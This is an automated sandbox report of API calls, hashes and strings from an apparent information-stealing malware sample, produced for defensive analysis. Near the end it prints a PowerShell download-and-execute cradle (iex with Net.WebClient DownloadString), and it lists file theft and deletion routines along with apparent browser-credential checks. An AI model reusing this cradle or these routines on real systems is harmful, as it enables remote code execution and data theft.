                                          • CloseHandle.KERNEL32(?,00000000,?,p/y,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022D6D81
                                          • ExitProcess.KERNEL32 ref: 022D6D89
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                          • String ID: p/y
                                          • API String ID: 2525456742-2423603383
                                          • Opcode ID: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                          • Instruction ID: 6bcfbd33479c23aa2598e5acad65a1707f33dcf806e674d585a9faef8277290a
                                          • Opcode Fuzzy Hash: 8bfceb1ee71bfa1add3f5fc1feb3515e0baf2b6ad89577cb8e665fbf230e511d
                                          • Instruction Fuzzy Hash: F0312775A60308ABDB04FBF0EC55FFD737AAF25300F640618B102A6198EFB85A44CE61
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022D68CA
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 022D698D
                                          • ExitProcess.KERNEL32 ref: 022D69BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                          • String ID: 0My$<$@Ly$0y
                                          • API String ID: 1148417306-1044796305
                                          • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                          • Instruction ID: 9b7c3c95e078da23ba48b08a191cde25f6cfced6328a631394ac5ef51581a7f2
                                          • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                          • Instruction Fuzzy Hash: AF3136B1911308ABDB14EFD0DD85FDEB77AAF14300F404189E205A6194DF746B89CF59
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                          • ExitProcess.KERNEL32 ref: 00416755
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                          • String ID: 0My$<$@Ly$0y
                                          • API String ID: 1148417306-1044796305
                                          • Opcode ID: 51a131c635dea9461ca5fbd9e512c5680335e93ee14c93c1efa3311f51896025
                                          • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                          • Opcode Fuzzy Hash: 51a131c635dea9461ca5fbd9e512c5680335e93ee14c93c1efa3311f51896025
                                          • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022D8397
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022D839E
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022D83BF
                                          • __aulldiv.LIBCMT ref: 022D83D9
                                          • __aulldiv.LIBCMT ref: 022D83E7
                                          • wsprintfA.USER32 ref: 022D8413
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                          • String ID: @
                                          • API String ID: 2774356765-2766056989
                                          • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                          • Instruction ID: badb4610ece10b2e44eb1f74b556a8f8ea68bf28e80b8d97ba417fcf64c88bc8
                                          • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                          • Instruction Fuzzy Hash: BB2147B1E54218ABDB00DFD4DC49FAEBBB9FB44B04F104609F605BB2C4C7B869018BA5
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess$DefaultLangUser
                                          • String ID: B
                                          • API String ID: 1494266314-2248957098
                                          • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                          • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                          • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                          • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                          APIs
                                          • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                            • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                            • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                            • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                            • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                          • memset.MSVCRT ref: 00409EE8
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                          • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                          • API String ID: 1977917189-1096346117
                                          • Opcode ID: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                          • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                          • Opcode Fuzzy Hash: 43ca3934b52a4446b4b6cf1fa4914ceec72bf29801e8da05ad35721471fe8544
                                          • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                          APIs
                                            • Part of subcall function 022C7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022C75A1
                                            • Part of subcall function 022C7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022C7618
                                            • Part of subcall function 022C7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022C7674
                                            • Part of subcall function 022C7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022C76B9
                                            • Part of subcall function 022C7537: HeapFree.KERNEL32(00000000), ref: 022C76C0
                                          • lstrcat.KERNEL32(0064A668,004217FC), ref: 022C786D
                                          • lstrcat.KERNEL32(0064A668,00000000), ref: 022C78AF
                                          • lstrcat.KERNEL32(0064A668,00421800), ref: 022C78C1
                                          • lstrcat.KERNEL32(0064A668,00000000), ref: 022C78F6
                                          • lstrcat.KERNEL32(0064A668,00421804), ref: 022C7907
                                          • lstrcat.KERNEL32(0064A668,00000000), ref: 022C793A
                                          • lstrcat.KERNEL32(0064A668,00421808), ref: 022C7954
                                          • task.LIBCPMTD ref: 022C7962
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                          • String ID:
                                          • API String ID: 2677904052-0
                                          • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                          • Instruction ID: 2561f650eb52ddf2f0995cf2b23094e74e628f722ad27fb3df6fe93dfc82ffd5
                                          • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                          • Instruction Fuzzy Hash: 2C312F75E50209EFDB04EBE0DC94DFE777AEB49301F245218E10667294DA34A942CF52
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022C5231
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 022C5238
                                          • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022C5251
                                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022C5278
                                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 022C52A8
                                          • memcpy.MSVCRT(00000000,?,00000001), ref: 022C52F1
                                          • InternetCloseHandle.WININET(?), ref: 022C5320
                                          • InternetCloseHandle.WININET(?), ref: 022C532D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                          • String ID:
                                          • API String ID: 1008454911-0
                                          • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                          • Instruction ID: 7b01eefef1caa15992afe42de62e73f4f660db41d40b0244a7214433ba5bd4e2
                                          • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                          • Instruction Fuzzy Hash: 553118B8A40218ABDB20CF94DC84BDCB7B5EB48704F5081D9F609B7284D7B46AC5CF99
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                          • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                          • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                          • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                          • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                          • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                          • InternetCloseHandle.WININET(?), ref: 004050C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                          • String ID:
                                          • API String ID: 3894370878-0
                                          • Opcode ID: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                          • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                          • Opcode Fuzzy Hash: 1dc63bcea8c89599eeebbab4266e6e891c5a7427e8975807a0a319ab44058970
                                          • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022D8DC7: GetSystemTime.KERNEL32(00420E1A,xJy,004205AE,?,?,022C1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022D8DED
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022CD6E8
                                          • lstrlen.KERNEL32(00000000), ref: 022CD8FF
                                          • lstrlen.KERNEL32(00000000), ref: 022CD913
                                          • DeleteFileA.KERNEL32(00000000), ref: 022CD992
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID: `Vy$.y
                                          • API String ID: 211194620-3424853670
                                          • Opcode ID: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                          • Instruction ID: 05b96733c0f4795ad4f432b67bc56df890511463b8d92267618f617432cc94d4
                                          • Opcode Fuzzy Hash: 2bccf2adba0c6573149dfae4533d97fd852c73f86cd25f235fac12d5c73a1e08
                                          • Instruction Fuzzy Hash: 17911172920308ABCB18FBE4DD95DEE733AAF24304F54466DE10662194EF346B49CF61
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00794A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D481
                                          • lstrlenA.KERNEL32(00000000), ref: 0040D698
                                          • lstrlenA.KERNEL32(00000000), ref: 0040D6AC
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040D72B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                          • String ID: `Vy$.y
                                          • API String ID: 211194620-3424853670
                                          • Opcode ID: 71153f48811ab97277adb1eba65f0c2a50862b60df6060ffb178010a9f1e5c68
                                          • Instruction ID: 265a03a5026cdf5fd4b8160f1a7263b5072f0f83edca8c83d8fca220a3e7f1c0
                                          • Opcode Fuzzy Hash: 71153f48811ab97277adb1eba65f0c2a50862b60df6060ffb178010a9f1e5c68
                                          • Instruction Fuzzy Hash: 8A9145719111089BCB04FBA1DD92EEE7339AF14318F50452EF50772091EF386A9ACB7A
                                          APIs
                                          • StrCmpCA.SHLWAPI(00000000,00793060), ref: 0041079A
                                          • StrCmpCA.SHLWAPI(00000000,007930A0), ref: 00410866
                                          • StrCmpCA.SHLWAPI(00000000,00793050), ref: 0041099D
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy
                                          • String ID: P0y$`0y$`_A
                                          • API String ID: 3722407311-2055732720
                                          • Opcode ID: f37fb10c9b6cf1a1dec8b5cf94e4c42fd659044f66138d1cb817d3683c15b997
                                          • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                          • Opcode Fuzzy Hash: f37fb10c9b6cf1a1dec8b5cf94e4c42fd659044f66138d1cb817d3683c15b997
                                          • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                          APIs
                                          • StrCmpCA.SHLWAPI(00000000,00793060), ref: 0041079A
                                          • StrCmpCA.SHLWAPI(00000000,007930A0), ref: 00410866
                                          • StrCmpCA.SHLWAPI(00000000,00793050), ref: 0041099D
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy
                                          • String ID: P0y$`0y$`_A
                                          • API String ID: 3722407311-2055732720
                                          • Opcode ID: b5689747017d0b1233e39e7abd20f6e68fcc7440175b3c06aa4901425a035c35
                                          • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                          • Opcode Fuzzy Hash: b5689747017d0b1233e39e7abd20f6e68fcc7440175b3c06aa4901425a035c35
                                          • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                          APIs
                                          • memset.MSVCRT ref: 022C158E
                                            • Part of subcall function 022C1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022C151B
                                            • Part of subcall function 022C1507: RtlAllocateHeap.NTDLL(00000000), ref: 022C1522
                                            • Part of subcall function 022C1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022C153E
                                            • Part of subcall function 022C1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022C155C
                                            • Part of subcall function 022C1507: RegCloseKey.ADVAPI32(?), ref: 022C1566
                                          • lstrcat.KERNEL32(?,00000000), ref: 022C15B6
                                          • lstrlen.KERNEL32(?), ref: 022C15C3
                                          • lstrcat.KERNEL32(?,004262EC), ref: 022C15DE
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022D8DC7: GetSystemTime.KERNEL32(00420E1A,xJy,004205AE,?,?,022C1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022D8DED
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                          • CopyFileA.KERNEL32(?,00000000,00000001), ref: 022C16CC
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022C9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022C9C53
                                            • Part of subcall function 022C9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022C9C78
                                            • Part of subcall function 022C9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022C9C98
                                            • Part of subcall function 022C9C27: ReadFile.KERNEL32(000000FF,?,00000000,022C16F6,00000000), ref: 022C9CC1
                                            • Part of subcall function 022C9C27: LocalFree.KERNEL32(022C16F6), ref: 022C9CF7
                                            • Part of subcall function 022C9C27: CloseHandle.KERNEL32(000000FF), ref: 022C9D01
                                          • DeleteFileA.KERNEL32(00000000), ref: 022C1756
                                          • memset.MSVCRT ref: 022C177D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                          • String ID:
                                          • API String ID: 3885987321-0
                                          • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                          • Instruction ID: ceb8943ab015d29f3454e07527db5c2eeeddbcc80be5ff719f3af0cbb8298130
                                          • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                          • Instruction Fuzzy Hash: E45160B1A603189BCB15FBA0DD91FED737EAF54300F4042ACA60A62084EF745B89CF95
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00412D85
                                          Strings
                                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                                          • 0y, xrefs: 00412D4E
                                          • ')", xrefs: 00412CB3
                                          • <, xrefs: 00412D39
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
